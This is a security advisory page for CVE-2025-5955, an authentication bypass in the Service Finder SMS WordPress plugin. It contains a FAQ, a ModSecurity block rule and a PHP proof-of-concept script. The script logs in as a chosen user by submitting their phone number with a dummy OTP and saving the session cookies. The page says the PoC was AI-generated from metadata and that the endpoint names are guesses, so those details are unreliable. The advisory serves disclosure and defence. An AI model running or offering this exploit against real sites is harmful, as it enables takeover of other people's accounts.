What is CVE-2025-5955?

CVE-2025-5955 is a high-severity authentication bypass vulnerability in the Service Finder SMS System plugin for WordPress, affecting versions up to and including 2.0.0. It allows unauthenticated attackers to log in as any user without verifying their phone number.

How does the vulnerability work?

The vulnerability arises from the plugin’s failure to verify the ownership of a phone number during the login process. An attacker can submit a request to the plugin’s AJAX login endpoint with any phone number, bypassing the SMS verification step, and gain access to the corresponding user account.

Who is affected by this vulnerability?

All users of the Service Finder SMS System plugin for WordPress who are running version 2.0.0 or earlier are affected. This includes any WordPress site that has installed this plugin and relies on SMS for user authentication.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Service Finder SMS System plugin installed. If it is version 2.0.0 or earlier, your site is at risk of this vulnerability.

What should I do if my site is vulnerable?

If your site is vulnerable, you should disable or remove the Service Finder SMS System plugin immediately. Since there is no patched version available from the vendor, this is the only way to mitigate the risk.

What is the CVSS score and what does it mean?

The CVSS score for this vulnerability is 8.1, indicating a high severity level. This score reflects the potential impact on confidentiality, integrity, and availability, meaning successful exploitation can lead to significant security breaches.

What are the practical risks of this vulnerability?

Successful exploitation allows an attacker to log in as any user with a phone number associated with their account. This could lead to unauthorized access, privilege escalation, data exposure, and potential complete compromise of the WordPress site.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a crafted request to the plugin’s AJAX endpoint with a target user’s phone number and a dummy OTP code. This shows the lack of verification in the login process.

What remediation steps should be taken?

To remediate the vulnerability, the plugin must implement server-side verification of the phone number before allowing login. This includes generating and validating a one-time password (OTP) sent via SMS.

Is there a patch available for this vulnerability?

As of now, there is no patched version available from the vendor for this vulnerability. Users must take immediate action to disable or remove the plugin to protect their sites.

What is CWE-288 and how does it relate to this vulnerability?

CWE-288 refers to Authentication Bypass Using an Alternate Path or Channel. This classification applies to CVE-2025-5955 as the vulnerability stems from the plugin’s failure to properly verify user identity through SMS, allowing unauthorized access.

How can I secure my WordPress site against similar vulnerabilities?

To secure your WordPress site, regularly update all plugins and themes, use strong authentication methods, and monitor for vulnerabilities. Implementing security plugins and conducting regular security audits can also help mitigate risks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 25, 2026

CVE-2025-5955: Service Finder SMS System <= 2.0.0 – Authentication Bypass (aone-sms)

CVE ID CVE-2025-5955

Plugin aone-sms

Severity High (CVSS 8.1)

CWE 288

Vulnerable Version 2.0.0

Patched Version —

Disclosed September 17, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-5955 (metadata-based):

The Service Finder SMS System plugin for WordPress (slug: aone-sms) in versions up to and including 2.0.0 contains an authentication bypass vulnerability. An unauthenticated attacker can log in as any arbitrary user without verifying possession of that user’s phone number. This vulnerability carries a CVSS score of 8.1 with a vector of AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H, indicating high complexity but severe impact on confidentiality, integrity, and availability without requiring privileges or user interaction.

Root Cause: Based on the CWE-288 classification (Authentication Bypass Using an Alternate Path or Channel) and the vulnerability description, the plugin’s login flow likely uses a phone number as an identity claim but fails to verify that the attacker actually controls the phone number. Atomic Edge analysis infers that the plugin may implement a “login with SMS” or two-factor authentication feature where a user provides a phone number and the plugin attempts to verify via SMS code. The vulnerability arises when the plugin accepts any arbitrary phone number (or bypasses the OTP challenge entirely) and proceeds to log the user in. Without source code access, this conclusion is inferred rather than confirmed, but the CWE and description strongly point to a missing verification step in the SMS-based authentication flow.

Exploitation: An attacker can exploit this vulnerability by crafting a request to the plugin’s AJAX login endpoint (likely /wp-admin/admin-ajax.php with an action parameter such as aone_sms_login or aone_sms_verify_otp). The attacker provides a phone number that belongs to an existing WordPress user (or perhaps the plugin creates an account based on the phone number). Since the plugin does not verify that the attacker received the SMS, the attacker simply submits the request with the target phone number and possibly a known or empty OTP code. The plugin processes the login and returns a valid session cookie. The attack is unauthenticated and requires no prior access. Atomic Edge research cannot confirm the exact action or parameter names without source code, but typical patterns for SMS login in WordPress plugins involve POST requests to admin-ajax.php with parameters like action=login_with_sms, phone=target_phone, and code=any_value.

Remediation: The plugin must implement server-side verification of the phone number before completing the login. This typically involves generating a one-time password (OTP), sending it via SMS to the provided phone number, and requiring the user to submit the correct OTP before the login is processed. The OTP should be stored server-side with an expiration time and must be matched against the user’s submission. Additionally, the plugin should enforce that the OTP verification endpoint only accepts valid, unexpired codes. Without these checks, the authentication bypass persists. Since no patched version is available from the vendor, users must disable or remove the plugin immediately.

Impact: Successful exploitation allows an attacker to gain full access to any WordPress account that has a phone number associated with it via the plugin. Depending on the user’s role, this could lead to privilege escalation (e.g., becoming an administrator), data exposure, content manipulation, or complete site compromise. The attacker could then install malicious plugins, modify pages, exfiltrate user data, or use the WordPress admin panel to execute arbitrary code. The CVSS impact score of 8.1 (High/High/High) reflects the severe consequences of such a bypass.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2025-5955 via aone-sms AJAX login',severity:'CRITICAL',tag:'CVE-2025-5955'"
  SecRule ARGS_POST:action "@streq aone_sms_login" "chain"
    SecRule ARGS_POST:otp_code "@rx ^.?$" "t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-5955 - Service Finder SMS System <= 2.0.0 - Authentication Bypass
// This PoC demonstrates logging in as an arbitrary user by exploiting the missing phone verification.
// Assumes the plugin's AJAX action is 'aone_sms_login' and accepts parameters 'phone' and 'otp_code'.
// The attacker provides the target user's phone number and a dummy or empty OTP code.

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress site URL
$target_phone = '+1234567890'; // Phone number associated with the target user
$otp_code = '000000'; // Any value; the plugin does not verify it

// cURL initialization
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'aone_sms_login',
    'phone' => $target_phone,
    'otp_code' => $otp_code,
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve-2025-5955-cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo "[+] Authentication bypass successful. Cookies saved.n";
    echo "[+] Use the cookie file to access the WordPress dashboard as the target user.n";
} else {
    echo "[-] Exploit failed. HTTP status: $http_coden";
    echo "[-] Response: " . substr($response, 0, 500) . "n";
}

curl_close($ch);

Frequently Asked Questions

What is CVE-2025-5955?
Overview of the vulnerability
CVE-2025-5955 is a high-severity authentication bypass vulnerability in the Service Finder SMS System plugin for WordPress, affecting versions up to and including 2.0.0. It allows unauthenticated attackers to log in as any user without verifying their phone number.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to verify the ownership of a phone number during the login process. An attacker can submit a request to the plugin’s AJAX login endpoint with any phone number, bypassing the SMS verification step, and gain access to the corresponding user account.
Who is affected by this vulnerability?
Identifying impacted users
All users of the Service Finder SMS System plugin for WordPress who are running version 2.0.0 or earlier are affected. This includes any WordPress site that has installed this plugin and relies on SMS for user authentication.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the Service Finder SMS System plugin installed. If it is version 2.0.0 or earlier, your site is at risk of this vulnerability.
What should I do if my site is vulnerable?
Immediate actions to take
If your site is vulnerable, you should disable or remove the Service Finder SMS System plugin immediately. Since there is no patched version available from the vendor, this is the only way to mitigate the risk.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for this vulnerability is 8.1, indicating a high severity level. This score reflects the potential impact on confidentiality, integrity, and availability, meaning successful exploitation can lead to significant security breaches.
What are the practical risks of this vulnerability?
Consequences of exploitation
Successful exploitation allows an attacker to log in as any user with a phone number associated with their account. This could lead to unauthorized access, privilege escalation, data exposure, and potential complete compromise of the WordPress site.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration details
The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a crafted request to the plugin’s AJAX endpoint with a target user’s phone number and a dummy OTP code. This shows the lack of verification in the login process.
What remediation steps should be taken?
Fixing the vulnerability
To remediate the vulnerability, the plugin must implement server-side verification of the phone number before allowing login. This includes generating and validating a one-time password (OTP) sent via SMS.
Is there a patch available for this vulnerability?
Current status of plugin updates
As of now, there is no patched version available from the vendor for this vulnerability. Users must take immediate action to disable or remove the plugin to protect their sites.
What is CWE-288 and how does it relate to this vulnerability?
Understanding the classification
CWE-288 refers to Authentication Bypass Using an Alternate Path or Channel. This classification applies to CVE-2025-5955 as the vulnerability stems from the plugin’s failure to properly verify user identity through SMS, allowing unauthorized access.
How can I secure my WordPress site against similar vulnerabilities?
Best practices for WordPress security
To secure your WordPress site, regularly update all plugins and themes, use strong authentication methods, and monitor for vulnerabilities. Implementing security plugins and conducting regular security audits can also help mitigate risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations